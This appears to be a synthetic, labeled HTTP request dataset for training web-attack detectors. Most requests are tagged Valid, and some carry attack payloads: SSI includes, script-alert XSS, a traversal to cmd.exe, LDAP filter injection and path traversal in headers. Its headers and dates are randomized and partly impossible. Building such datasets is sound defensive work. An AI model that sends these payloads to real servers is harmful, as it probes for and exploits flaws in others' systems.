MIME-Version: 9.5
Pragma: ein6ks1d='lteTri'
Proxy-Authorization: NTLM aHV0blRvZXBhRXVxZmw0Z3MxUGVodG82Z3lldnRlb2FvY3MxOGlnbG9nbQ==
Authorization: cywcts ehjl=so3y
Range: -34624,61390-055,75119-
Referer: /eoumkci/AriiOm/f4oeins/eiifjz/smeMdU.cfm
TE: chunked,trailers,trailers
Trailer: Range
User-Agent: Mozilla/8.3 (X11; U; Solaris 0.2; at-dz; rv:0.0.5) Gecko/64733245
UA-CPU: Sparc
UA-Disp: 868,0811,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 063x9656
Via: FTP/4.3 www.eeItha1.jpeg, 5.0 www.lumxirHU.js:02, 5.9 www.fd8oS8l.jpeg
Transfer-Encoding: identity
Upgrade: eeeDo/9.0
Warning: 195 79.247.8.91 "v9omtairreetwatxt" 
X-Forwarded-For: 194.51.251.17
X-Serial-Number: 64954855399337418
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1854
Start - Id: 19216
class: Valid
GET /px5on6eoofdL2owt07e/ijimgOj2@T/iepsf/aHW6_CoY2aVSpn/rvZ0pZ@V9mZ@s3.shtml?cmdTjZaKj=ban&inputSMvallQOW=dtoav%28escriptmocha%7ElT&rsaO=rD72 HTTP/1.0
Host: 249.198.81.166
Connection: close
Accept: application/rtf;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 8T7-ufedpo, i-imiiAteS, eq-Y6rqhat;q=0.9, r-nBeikoef, le-ubpstzca;q=0.0
Cache-Control: yae='9elp'
Client-ip: 110.180.76.34
Cookie: irosai=>(o6taiTe;uedisenoa=enhpyVOKj;hhenehEreheeer=67;atmn7actl=nb-MW6L046g
Cookie2: $Version="324"
Date: Fri, 18 Apr 08 15:25:10 GMT
ETag: W/"SP8ST892djoJD596"
Expect: gp6cD8t=ewrsd6;afdeneai
From: 1Mrro3ep@siss5a8eg.net
If-Modified-Since: Thu, 03 Jun 04 16:54:07 GMT
If-Unmodified-Since: Fri, 22 Oct 04 14:17:37 GMT
If-Match: "KxTCxrTcqI-TeVy"
If-None-Match: *
If-Range: Fri, 09 Dec 05 16:59:09 GMT
Max-Forwards: 4
MIME-Version: 4.0
Pragma: ht=dairEe
Proxy-Authorization: Digest uri=/8tsi1ee/nreUitch/ynlernls/rylqcbHp/vyr6.shtml
Authorization: Basic dGp1b3I6dmVhbg==
Range: 6738-658640
Referer: http://www.eeelOTte.org/csoEin2n/cn4St/atbneA.tar.gz
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/8.5 (compatible; MSIE 6.3; Win 9x; nIiUcmDb8n)
UA-CPU: 68000
UA-Disp: 399,520,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 203x411
Via: FTP/8.4 90.27.24.152:43, 1.5 52.31.41.211
Transfer-Encoding: lrUntm; mrot=sirt
Upgrade: deldgt/6.6
Warning: 712 119.160.165.41 "pneeepsiiweeth" "Wed, 09 Apr 08 02:46:58 CET"
X-Forwarded-For: 241.243.123.217
X-Serial-Number: 31033243317448893710
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19216
Start - Id: 15872
class: Valid
GET /N2P/nc7-Stt/vfjnENRuffeuoob/nD4D6Us/mvoIysssR/wnsspgposoltpr2bc/Vvyq1imglfaccess_log.jsp?spl3entht2eatD=agncTzoSg&ttnDxv6o=iq2&dytreinupqh=15130&ic6wonho=065&nIefalualt=Lopt%3F+d-ttlwh HTTP/1.1
Host: 98.156.58.205
Connection: close
Accept: video/*;q=0.1, image/jpeg
Accept-Charset: iso-8859-7;q=0.3, iso-8859-3;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 5.20.235.84
Cookie: se8r=8081293
Cookie2: $Version="859"
Date: Sun, 27 Jul 08 06:31:08 UTC
ETag: "mnxpCKE2@e9_rVFnbaF"
Expect: 6idefie
From: oh9y8fhi@dik4gedttt.ch
If-Modified-Since: Tue, 17 Feb 04 20:33:51 GMT
If-Unmodified-Since: Sat, 20 Mar 04 07:54:41 GMT
If-Match: "CyDQ4Maak7zRh0Ad"
If-None-Match: *
If-Range: *
Max-Forwards: 213
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM c3JibW50YWVpdDdpSWRzc2FpdHJSdmFleWFzb0J0RHVhYXM2dDI=
Authorization: Digest algorithm=MD5-sess
Range: 782037-,-78,7952-96
Referer: /Bsar/oeqt1rtu/hgtomaC/aUar.css
TE: trailers
Trailer: TE
User-Agent: l9XkhH1T http://www.mpdoi.com
UA-CPU: StrongARM
UA-Disp: 318,100,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 901x093
Via: HTTP/1.5 188.158.233.224, 6.2 210.147.158.99
Transfer-Encoding: deflate
Upgrade: ae5a/2.7, top/0.4, ml19a/6.1, llc/5.5, otta/2.3
Warning: 852 www.Fiwtsn.shtml "ihfsh8jdypliiiwuwpzx" "Sun, 04 Jan 09 23:10:37 GMT"
X-Forwarded-For: 188.189.177.85
X-Serial-Number: 828350
----: ------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 15872
Start - Id: 40558
class: SSI
GET /soentqj/fZtVBLp/7j2wwde45StjnnM9B/xxCO3NMjUfrGz/6S8iDu8P3/tR3m1zjd_3D/sxtermFIq-74m/nLtRLheg/baegrqiAve2UaohemHv.swf?oyueha=ff&eEt3oigU=aLegegowfcNhu%28&hh7ther8ahtm=rP0O&avdo3e=6842923&koIvDinput2Cprocessing-instructionA=016474&0ke7ye=Weahc7+nushutdownddo&s.fOH9iframeEf=l2r&jf2=%3C%21--++%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++++--%3E&aittbr=nEsvoz&dMI5Cw_IWNc=rL6mJ&elwldddegcr8etl=eKzAhYbco9&ealenLCua3f2r6a=%28mgh&un=kHag0edieeshutdownmNhutei HTTP/1.0
Host: 228.140.53.201
Connection: keep-alive
Accept: audio/*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: ewekhd-nooewi1i;q=0.6, ssaIdmhO-tiep;q=0.7, ee-r7ipesoe, nH-a;q=0.5
Cache-Control: no-store
Client-ip: 99.30.78.189
Cookie: Btieo5m0iaae=eed;Sokdi=i;oyelh=0Yrpositione
Cookie2: $Version="29"
Date: Mon, 21 Jan 08 24:49:22 CET
ETag: W/"VEwXvIPJydSElJl5fyvM"
Expect: 100-continue
From: tyoPDg0e@eA2xhe.com
If-Modified-Since: Tue, 25 Sep 07 23:30:35 UTC
If-Unmodified-Since: Sun, 25 Apr 10 10:44:07 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 30 May 09 10:53:02 CET
Max-Forwards: 09
Pragma: tep='t4G'
Proxy-Authorization: esno rs47tyd=n7dsbg
Authorization: Digest realm
Range: 092301-3,261-278,-586839
Referer: http://4te5eOSi.com/k1n8zt.tiff
TE: chunked,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/8.9 (X11; U; Linux i586 5.6; m3-o9; rv:4.5.5) Gecko/88729466
UA-Disp: 9897,2290,16
UA-OS: Windows 98
UA-Pixels: 0455x286
Via: FTP/6.9 www.hsmaed.tiff, 1.5 www.5ffisO6.css:72, 5.6 170.255.54.27:64
Transfer-Encoding: identity
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 885 www.ctsaoon.js "2nm3fnnnfehteoPv" "Sun, 30 Sep 07 18:31:53 UTC"
X-Forwarded-For: 62.56.145.236
~~~~~: ~~~~~~~~~~~

null

End - Id: 40558
Start - Id: 26014
class: Valid
GET /antbnptomusi/ar4dedhndsauwts/nwbcrqT@kWlEZFnJ/b3jS@R2IndocumentN/h7UbL0PlV./aga3tv00zCV.js?AtoftnIahiatv=ld&8etbirjiob=rsnaE&oiasz2a2ior=eboot.inigeetyS2&ydyhvblk=16133&dblacmto=37474298&tadt6nomu7bnw=42&aONtr=71328&0ola=96ZSmZO&O5rr=5Q1HKs&Sepositionacceptpasswd=64363267&3a3ipoii0erai=rp0r&dbpEhohm=3406&passthruNnFug0QAIU=wp-+E&9tdtiArbri=82772751 HTTP/1.0
Host: www.hqasews0sq.be:37
Connection: drfel1zt
Accept: */*;q=0.8
Accept-Charset: ks_c_5601-1987;q=0.5, iso-2022-kr, iso-8859-4, iso-8859-8;q=0.0
Accept-Encoding: *;q=0.8
Accept-Language: xrsai-lomTa, eoeor4h-lrv, an-pmeos;q=0.3, aqeea2e9-trI0Ruo, sdl-rnceyee4;q=0.3
Cache-Control: hahaubta=yrv
Client-ip: 254.230.111.50
Cookie: wenz=e:~6newyTelLx;b8s=03
Cookie2: $Version="46"
Date: Thu, 17 Feb 05 08:42:12 UTC
ETag: W/"2Z@8jn@K098vvdP_8cU"
Expect: hmrtyoF
From: rerwoEN@echst.gov
If-Modified-Since: Thu, 03 Jan 08 05:59:27 GMT
If-Unmodified-Since: Sun, 19 Nov 06 08:50:26 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 28 Dec 07 02:27:45 GMT
Max-Forwards: 6
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic dHVhZHg6aEhFenJuZA==
Authorization: int3j hewrw3=donnt
Range: 93614-
Referer: http://eiub.ch/h3aS/oe7R.jsp
TE: gzip;q=0.2
Trailer: Host
User-Agent: iTRviT http://www.vhnril.biz
UA-CPU: x86
UA-Disp: 4002,120,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8535x949
Via: 6.7 www.otzas.js:9370, 7.0 212.178.216.143, 4.1 www.aaefa.css
Transfer-Encoding: identity
Upgrade: yuk/5.7, RisS/8.9
Warning: 578 216.112.216.157 "mtdt" "Thu, 22 Apr 10 15:51:14 GMT"
X-Forwarded-For: 212.90.246.248
X-Serial-Number: 2136376568868794089
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26014
Start - Id: 8103
class: Valid
GET /g1W./A6pFevO@@CXtmpu9G/obsebl/qkfIvgmhiz/o3F-_WjFx/cq@TuioLkIvrfw2.VVB/wghN_-VD/qtupe8nm1eu/esom/alatiorcoI0dh.sh? HTTP/1.0
Host: www.mfa71.gov:55267
Connection: close
Accept: audio/*, video/quicktime;q=0.8, audio/basic
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.1, identity
Accept-Language: eoit3t7t-TpoEt, tvEasu-aHge;q=0.4, vixha3f-etrtejVk;q=0.5, ustenitd-bl
Cache-Control: no-transform
Client-ip: 96.68.165.0
Cookie: ta=av9RdGUy;xs9=tzqOFwX
Cookie2: $Version="9"
Date: Thu, 11 Jan 07 22:37:59 CET
ETag: "w3tPUmOSoBs81@Wa2En"
Expect: rcti=i8busaat;ottreO=uetom
If-Modified-Since: Sat, 16 Jun 07 09:25:02 CET
If-Unmodified-Since: Fri, 26 Mar 04 04:24:23 UTC
If-Match: "Rh0ZNyhTOwVXROJ5lClC"
If-None-Match: "eCC3T@qL26DUctdlJvsb"
If-Range: "v-3Ytwwa295MH.Bqsmg"
Max-Forwards: 9
MIME-Version: 2.4
Pragma: l8te=xhlnvrs
Proxy-Authorization: NTLM bmV0cmJjZWRpb3NmdXQ1bVNsZGFhb2FyYWhpZGV0aWw=
Authorization: Basic ZW9lYW46cmxzc3RudA==
Range: 96926-503180,-72
Referer: http://www.tsonasxh.fr/sbllr/8r7mow/iU8o/V9i6ai/escudlqT.gif
TE: trailers
Trailer: User-Agent
User-Agent: chohutemEylfhriaAph
UA-CPU: 68000
UA-Disp: 4009,1990,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 308x6685
Via: 5.3 www.ye5Sve1u.htm, 9.2 172.45.22.182
Transfer-Encoding: deflate
Upgrade: vrie/7.0, tOH1/8.2, csale/4.6
Warning: 207 www.eaigb.htm "nqposom8cjoD7Vewo1b" 
X-Forwarded-For: 20.60.245.141
X-Serial-Number: 74656
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8103
Start - Id: 11157
class: Valid
GET /5rG/5siorosehsgst5fdoba/KPRXo1/uE45E/scripthavingD5601echornodeis2.css?MTeIdrhhejhS=094&oarseatc=%5Ccopysr%26&fr8g0jt=%5C%3C&a3etayscr=q0WAi4hTRd HTTP/1.0
Host: 20.161.137.124:7775
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=5873
Client-ip: 124.3.147.71
Cookie: egltje=tSmssp;4RTgElwfbPtmp=rltrrlyh8otk
Cookie2: $Version="13"
Date: Sat, 24 Jan 04 09:16:24 UTC
ETag: W/"xfNTQooR.4nZTmOj."
Expect: 100-continue
From: daneee@lheneowi.org
If-Modified-Since: Mon, 28 Dec 09 13:17:03 CET
If-Unmodified-Since: Tue, 14 Dec 04 22:50:24 CET
If-Match: "GLws.FTJSwlp@ol"
If-None-Match: "HM30z-L2J9wRkOuy"
If-Range: Sun, 18 Mar 07 24:18:05 CET
Max-Forwards: 1247
MIME-Version: 0.7
Pragma: M1Tr3l='odwtjl'
Proxy-Authorization: Digest response="FF6f55D1baDeb6c2C872bb57B9eB0aDd"
Authorization: NTLM Y3RvdGhoYWdob3RlcmdsaDA1dHR1Zk5lTmRxbk9sZWU3ZUlzdGVv
Range: 01809-,9808-,-723
Referer: /aaeaeeR.js
TE: trailers,gzip;q=0.1,trailers
Trailer: Trailer
User-Agent: Mozilla/0.0 (Machintosh; U; PPC 3.8; sc-tC; rv:7.3.6) Gecko/40307172
UA-CPU: 68000
UA-Disp: 8419,120,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 571x624
Via: 5.8 197.162.148.7, 1.0 21.38.131.37
Transfer-Encoding: deflate
Upgrade: hgrW/3.1
Warning: 319 57.235.65.0 "jRcg2cbta" "Thu, 02 Apr 09 11:25:24 GMT"
X-Forwarded-For: 199.166.24.178
X-Serial-Number: 98553683859236748
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 11157
Start - Id: 17329
class: Valid
GET /rQw1WetzTCa.jsp?abcfkaodoecph=dede&tTettoei=srdpn%3AAlstd&rrma=huDtCeno0anmd&reie=iQFZ2M&fluasaanwea=oinfMay36agh&7tjai=9109&AIXCy.p1=naC7illi&zqhytni=ArteAtow&Tn@Nc.=%5Bub&fNcymesl=euaarrimtheh HTTP/1.1
Host: www.ijtr2s9e.fr
Connection: aEtarh
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 251.211.186.188
Cookie: g7Eer0rdaedS=thogHuOls;atu8=s72;rbDsn=8gexNyxs5r;9@Nl=eR2tc/xa<
Cookie2: $Version="840"
Date: Fri, 30 May 08 24:45:42 GMT
ETag: W/"yMDXvl2uoFuOP3i"
Expect: 100-continue
From: 1rsdas@zamn2no.de
If-Modified-Since: Thu, 17 Dec 09 13:31:25 UTC
If-Unmodified-Since: Tue, 16 Oct 07 24:42:10 UTC
If-Match: *
If-None-Match: "JhVZ@tv.XdXvrzLTy"
If-Range: "6zxEAMwvFoZaGmly2G"
Max-Forwards: 717
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Digest uri=/dEasnr/nifefdsN/jtmItno/tqlthnia/esaa.dll
Authorization: NTLM Mm9hbnRndnN0N2V0NjdiZmZlYWRkaG5rYWl5YXRzYmlzSDFzOWVkbGFxaA==
Range: 570800-
Referer: /76efult/ufesr/af3tp2/ycp0totN/rois.gz
TE: trailers
Trailer: Range
User-Agent: 73sK0FeU http://www.aiPrbxf.be
UA-CPU: 68000
UA-Disp: 1914,5330,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 455x7663
Via: HTTP/1.8 159.139.24.203, HTTP/4.1 www.ihuplyp4.png, HTTP/2.2 210.42.162.253
Transfer-Encoding: gzip
Upgrade: miR/8.7
Warning: 540 139.31.62.25:6754 "edlefMhEnqak" 
X-Forwarded-For: 137.232.96.91
X-Serial-Number: 75371955994853740
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 17329
Start - Id: 46547
class: XSS
GET /<SCRIPT>alert(document>URL)</SCRIPT>/? HTTP/1.1
Host: www.asronbcd.de
Connection: close
Accept: text/plain;q=0.9, audio/*, application/postscript
Accept-Charset: cp-932;q=0.2, gb2312;q=0.7, cp-932, iso-8859-4;q=0.0
Accept-Encoding: compress, gzip;q=0.8, gzip, deflate;q=0.4, gzip;q=0.0
Accept-Language: Muad-sB;q=0.1
Cache-Control: min-fresh=83
Client-ip: 23.69.31.217
Cookie: lsiiaet4oF3lu6o=tkraourtesmdlrsey;NbF@2IOy=EbeyemmrnSw
Cookie2: $Version="0"
Date: Mon, 05 Sep 05 19:02:29 GMT
ETag: W/"u2fAqilJFYAF0Ew"
Expect: atpSh=pnachAn
From: ns7rogjc@npah.it
If-Modified-Since: Sun, 02 Sep 07 10:24:22 GMT
If-Unmodified-Since: Sun, 08 Jun 08 23:39:43 GMT
If-Match: "iLOhLxoR3j4_-XKb."
If-None-Match: "hPGt9QnybP6VRaKXg"
If-Range: *
Max-Forwards: 91
MIME-Version: 6.0
Pragma: nLt4dRoh='eara'
Proxy-Authorization: Digest username="rgww0see"
Authorization: Digest uri=/heoeOt8.bin
Range: 2794-2,-4107
Referer: http://a5sAtd.cz/e95s9hhh/aaomrH/cnho/lsanfae/fyMlli.mpg
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/6.4 (compatible; MSIE 4.0; Linux i586; Weexo)
UA-CPU: 68000
UA-Disp: 884,253,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 139x000
Via: 3.6 www.leDaou.jpeg, 1.5 36.110.101.55
Transfer-Encoding: nip2l; nnsesgog=Metol
Upgrade: m51if/7.5, rhhtal/3.2, em5Twu/2.8, pvaaul/4.8, ar9/6.0
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Forwarded-For: 45.4.150.153
X-Serial-Number: 907134703793407479
----: ---------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 46547
Start - Id: 15909
class: Valid
GET /lmY9tevQi3FOyELWFWX/Es/4x6jenrtoa/e10asyvk/s2ELXc7L/a@VQWS4eFC/Wy2rotio2aj5haeo9set/slUNb@rzUSPzJ/kelyen.pl?bazFdMemocha5=ev HTTP/1.1
Host: www.peiacih.com
Connection: close
Accept: video/mpeg, video/*
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 12.135.89.242
Cookie: tZte=40;DFHd1Zo=f2Iv5UEgHg6j
Cookie2: $Version="8"
Date: Thu, 10 Aug 06 11:44:42 CET
ETag: "tk-.QLr.a-duJ04A"
Expect: 100-continue
From: p3cchen@etaH.uk
If-Modified-Since: Tue, 07 Mar 06 06:35:38 CET
If-Unmodified-Since: Tue, 11 Sep 07 18:15:52 UTC
If-Match: "SQN@son55PMqnQN"
If-None-Match: *
If-Range: "NZL-.u@I4xAaNWp"
Max-Forwards: 8
MIME-Version: 2.7
Pragma: a=ehrsjele
Proxy-Authorization: Basic bzNsdzppc2xo
Authorization: Basic TmZpZDoxcmIwZGk=
Range: 24232-,-81,-37455
Referer: http://www.HLttu.org/ettomoo/qDhbl/5ostaUv.cgi
TE: trailers,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.3 (X11; U; Unix 7.1; ym-Nl; rv:6.1.3) Gecko/15345693
UA-CPU: x86
UA-Disp: 1586,328,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 723x196
Via: 3Ret0d/8.6 195.149.8.1, 7.6 www.Jbbjeu.png, HTTP/0.0 105.106.153.110
Transfer-Encoding: ndtet8
Upgrade: auc/1.8
Warning: 168 www.pbkslL.tiff "cad37ddmsf" "Thu, 31 Jan 08 09:57:52 UTC"
X-Forwarded-For: 185.247.30.17
X-Serial-Number: 721965
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15909
Start - Id: 44195
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 114.213.188.72:80
Connection: rift
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.2
Accept-Language: esy-ekonoeh, 3rfppo-qz, e0i5olg-mbos;q=0.3
Cache-Control: no-cache
Client-ip: 130.86.46.202
Cookie: o2mo=formF;xjpemaasxmovo=14399360;webspedsg=421973
Cookie2: $Version="1"
Date: Wed, 26 Nov 08 12:54:48 UTC
ETag: "BRW_@ARVUq6pOiuJ"
Expect: yoeh
From: rOaz@gEadsxsee.biz
If-Modified-Since: Mon, 13 Apr 09 06:25:35 UTC
If-Unmodified-Since: Fri, 30 Apr 10 14:14:25 GMT
If-Match: "51GGEvrUjWv6RfhQUW"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: Digest nonce
Range: 22399-
Referer: /ipltiN0e/aeth/pyddma.php4
TE: trailers,deflate,trailers
Trailer: Referer
User-Agent: Mozilla/7.5 (X11; U; Linux i386 2.4; be-tj; rv:8.2.3) Gecko/72668414
UA-CPU: PowerPC
UA-Disp: 054,707,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8125x427
Via: FTP/3.3 34.131.158.29:9022
Transfer-Encoding: deflate
Upgrade: daad/0.7, ule/2.7
Warning: 700 www.yhebtw99.tiff "Igi9im" 
X-Forwarded-For: 81.148.120.241
X-Serial-Number: 77570647240448229537
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44195
Start - Id: 17526
class: Valid
GET /reHs4aOefixrtsoaumno/daHahaeieooe2oiejerT/eM4@SL0/iNRi-YkM7Te/sEQAZsUOh/Sbhttpt/oexodtetiiion/phhaj5/cahY@eUZVEr5b.tiff?Lb_mC_MClog=yfqZ4nBzfDj&neyaeEeinsadiau=zmdxehahRtiySdrwI&y7rmga=%5Dk-ntah0ie&hrselyeysaeet=56755&llit=ubACF-pdKs HTTP/1.1
Host: 74.206.187.205
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.6, gzip;q=0.9, identity;q=0.7, identity
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 97.28.180.226
Cookie: n.shutdown8f2e1Cz.=17236;e1ett26edschmot=iz&EcR
Cookie2: $Version="11"
Date: Tue, 23 Jun 09 02:45:07 CET
ETag: W/"3-@NsXhqdePj1@D@Dq0A"
Expect: 100-continue
From: agsqfno@mLjAif.net
If-Modified-Since: Wed, 09 Jan 08 14:07:13 CET
If-Unmodified-Since: Mon, 24 Apr 06 13:41:05 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 16 Apr 05 16:00:10 GMT
Max-Forwards: 895
MIME-Version: 1.1
Pragma: wqsdItzt='D'
Proxy-Authorization: Basic YTFubDpleTFzbnVl
Authorization: Digest nonce
Range: -90,3-
Referer: http://spkdsn.biz/hi27kem/eiHkao92/e6b7rlit.exe
TE: deflate,deflate,trailers
Trailer: Range
User-Agent: olLslsohetEttii
UA-CPU: StrongARM
UA-Disp: 2505,061,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 6595x691
Via: HTTP/5.2 www.adaah.js, 0.2 181.175.82.173, HTTP/8.3 www.aIaihhhs.gif
Transfer-Encoding: dei65i; lw0seo=doae
Upgrade: SeErb/6.9, tergey/9.8, tRtb/8.4, ytit6/9.8, s8ae/9.8
Warning: 256 www.hcAgiw.jpg "izNdebthOurploq" 
X-Forwarded-For: 108.35.186.201
X-Serial-Number: 2759427
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17526
Start - Id: 37463
class: LdapInjection
GET /metaXSRKkCchild/oUNM9it5KmUm8fpWH/dgIn/iMUsGeavt.XG/uelvo6heneec/Fu33ZFi5iYT.msf?r2ij1siioy=720219&eeeErc=%3Dhhs&tlmko=rm9L&bap3t6fVsaie=oV_2q6L0&LRaccess_lognf8Djzsam=8540 HTTP/1.0
Host: 19.140.126.0
Connection: close
Accept: application/*, audio/x-wav, text/html
Accept-Charset: windows-1253;q=0.8, iso-8859-8;q=0.3, x-mac-icelandic, iso-8859-15;q=0.4
Accept-Encoding: identity;q=0.5, gzip
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 97.241.16.223
Cookie: evb=0DSbB2aQbNm;ltStttrs=mo6)(|    (nia=*)
Cookie2: $Version="3"
Date: Mon, 16 Mar 09 23:08:47 UTC
Expect: 100-continue
From: N3ngga4t@jimvmunTsn.fr
If-Modified-Since: Tue, 04 Apr 06 12:20:55 GMT
If-None-Match: "SJaH0V.mOvwTf8VIajr"
Max-Forwards: 8946
Authorization: cEanl 3osxet=auetn
Referer: /fetez.html
Trailer: If-Range
User-Agent: Sh2Sa/9.8.9.0
UA-OS: Win9x
UA-Pixels: 9871x247
Via: HTTP/9.5 159.13.232.127, 0.3 2.129.36.50
Transfer-Encoding: pieta
Upgrade: l7van/3.4

null

End - Id: 37463
Start - Id: 25654
class: Valid
GET /st5krazrlgl/p1M@6nQiPLo0rmH/yu2_L1SwjeT-BQjatdf/eDHum2-RV@T/47leesodssv3ufsusup/sIso5zsbee/sQUF1zRPCg6SToO0/09L5cvF/mPY@X6isam3WDv.php4?Iewosmonbm1g=t4.TiMLy-dG&dzmYlitgsueu=elurswo0locationhto%3Dimgpcry&hTfek0raT=i&peErt7=2&defwlrpwesa=0730&ih6anr=hbJ&TWsqoYZ6i6=+9gpymh1%27abn%24pse&diiG5relt=35485 HTTP/1.1
Host: 215.78.239.179:0
Connection: close
Accept: image/png;q=0.4, video/mpeg, text/*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 163.112.170.136
Cookie: h0dpImrddh=|htacces8EpHoxtermd~ihmoj< ;tki4ai=70247656;oeaiEiR9uiasd=6193191;iabykvn='|kgi;.j0Z=wb
Cookie2: $Version="0"
Date: Sat, 18 Sep 04 12:08:03 UTC
ETag: W/"7eTfVhdTQmnM5XVe75"
Expect: 100-continue
From: ma49@uare.ch
If-Modified-Since: Sun, 04 Apr 10 06:09:17 GMT
If-Unmodified-Since: Mon, 27 Aug 07 22:29:13 GMT
If-Match: *
If-None-Match: *
If-Range: "gg0qEfkEBUoChmFf"
Max-Forwards: 670
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nc=cECD7cB1
Range: -55
Referer: /ndrOb/evekrar/jHdAA.msf
TE: trailers,gzip
Trailer: Range
User-Agent: Mozilla/2.6 (compatible; sii1wioeoe; Open BSD i586; srtttncs; eeaws)
UA-CPU: 68000
UA-Disp: 349,527,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 8213x490
Via: HTTP/8.2 39.3.163.68
Transfer-Encoding: gzip
Upgrade: oyo8/5.6
Warning: 849 www.a80e.jpeg:2725 "efl1xbzhwbe" 
X-Forwarded-For: 7.72.51.122
X-Serial-Number: 33104741
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25654
Start - Id: 45971
class: PathTransversal
PUT /aol4tqose/st.asp? HTTP/1.1
Content-Length: 176
Content-Language: Da,bgsstcp,npss28ha
Content-Encoding: deflate
Content-MD5: c3JqYXVrYkhyeTJsZWFtZA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Aug 06 11:03:02 GMT
Host: www.6iOatgetxd.biz
Connection: close
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.7, koi8;q=0.3, euc-cn
Accept-Language: ..\..\..\..\WINNT\system.ini
Cache-Control: idinyoy='Pldt1nc'
Cookie2: $Version="661"
Date: Mon, 23 Jun 08 03:17:51 CET
ETag: W/"I6Z0ysyfi9upk5OXhCH"
Expect: to84bwb
From: xstoos@uosi.be
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
Authorization: Digest qop=auth
Referer: /noepnrf/pNAf/oAieeoao/jVaf/caaIeid.jpg
Trailer: Authorization
User-Agent: ../../../../../../../../../WINDOWS/autoexec.bat
UA-CPU: StrongARM
Via: 5.5 www.qeih.shtml:26716
Transfer-Encoding: gzip
Upgrade: fsoe/9.8, uwtd/5.6, pcsCta/5.2
Warning: 639 www.s0oi.shtml "mlecsk7vago4n8n9set" 
----: ------------------

dq7=hpzhiepo&m1iutr5s1=e&eWjnY1efnebA=i-=bin&hoat5eeaasOc=40017373&rdes3doqcW=gtQcNsx3HEJE&lointn=527923949&1hsor=3kNopgbA0rb&eease7csq=i caoeselectisernpeNm1REh&E4rja=950074

End - Id: 45971
Start - Id: 17892
class: Valid
